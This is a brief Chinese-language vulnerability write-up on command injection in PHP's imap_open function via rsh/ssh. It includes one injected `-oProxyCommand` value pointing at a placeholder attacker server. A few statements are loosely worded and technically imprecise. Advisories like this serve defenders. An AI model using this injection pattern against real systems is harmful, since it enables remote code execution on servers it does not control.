本文共 469 字，大约阅读时间需要 1 分钟。

1、产品简介

IMAP作为远程邮箱协议，是在系统中执行命令的重要桥梁。Internet消息访问协议（IMAP）是电子邮件客户端通过TCP / IP连接从邮件服务器检索电子邮件的标准协议。由Mark Crispin于1986年设计，IMAP的主要目标是允许多个客户端管理收件箱，服务器通常保留消息直到用户删除。默认情况下，IMAP服务器侦听143端口，而IMAP over SSL（IMAPS）使用993端口。PHP支持IMAP功能，提供了便利的API，如imap_open，用于打开IMAP流。该函数来源于UW IMAP工具包环境，已发布多年。

2、漏洞概述

PHP的imap_open函数存在一个严重漏洞，可能允许经过身份验证的远程攻击者执行任意命令。该漏洞源于imap_open在调用rsh或ssh命令时未正确过滤邮箱名称。如果系统启用了这些功能，且rsh指向ssh命令，攻击者可通过伪装成IMAP服务器名单，向目标系统发送命令，例如： `-oProxyCommand='rsh -i <攻击者服务器> '` 这将导致远程代码执行，给系统带来严重风险。